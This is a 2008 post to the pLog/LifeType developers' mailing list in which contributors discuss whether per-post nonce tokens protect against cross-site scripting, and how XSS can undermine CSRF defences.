[pLog-svn] xss in 1.2.7

Jon Daley plogworld at jon.limedaley.com
Mon May 5 23:54:10 EDT 2008


 	I must really not be getting XSS then.  If every post has to have 
a token on it, how would someone guess the token in order to have the 
javascript be accepted and displayed on the screen at all?  I'd expect the 
token to be checked first, and simply die() if it doesn't match.
 	I can't figure out a scenario where an attacker would be able to 
get javascript displayed on the screen to be executed within the context 
of that domain to steal a cookie, or do anything.

On Mon, 5 May 2008, Matt Wood wrote:

> a nonce/token isn't a defense against XSS... it isn't even a very good
> defense against CSRF, but the best we really know about ATM.
>
> On Mon, May 5, 2008 at 5:41 PM, Jon Daley <plogworld at jon.limedaley.com>
> wrote:
>
>> On Mon, 5 May 2008, Reto Hugi wrote:
>>
>>> But in most cases CSRF countermeasures become useless if you have XSS
>>> vulnerabilities (remember: XSS means code injection in your html, means
>>> possibility to grab nonces etc...)
>>>
>>        Right, but if you don't even accept the POST in the first place,
>> that it doesn't matter what the content is, no matter where it came from,
>> right?
>>
>> _______________________________________________
>> pLog-svn mailing list
>> pLog-svn at devel.lifetype.net
>> http://limedaley.com/mailman/listinfo/plog-svn
>>
>

-- 
Jon Daley
http://jon.limedaley.com/

An essential aspect of creativity is not being afraid to fail.
-- Dr. Edwin Land


More information about the pLog-svn mailing list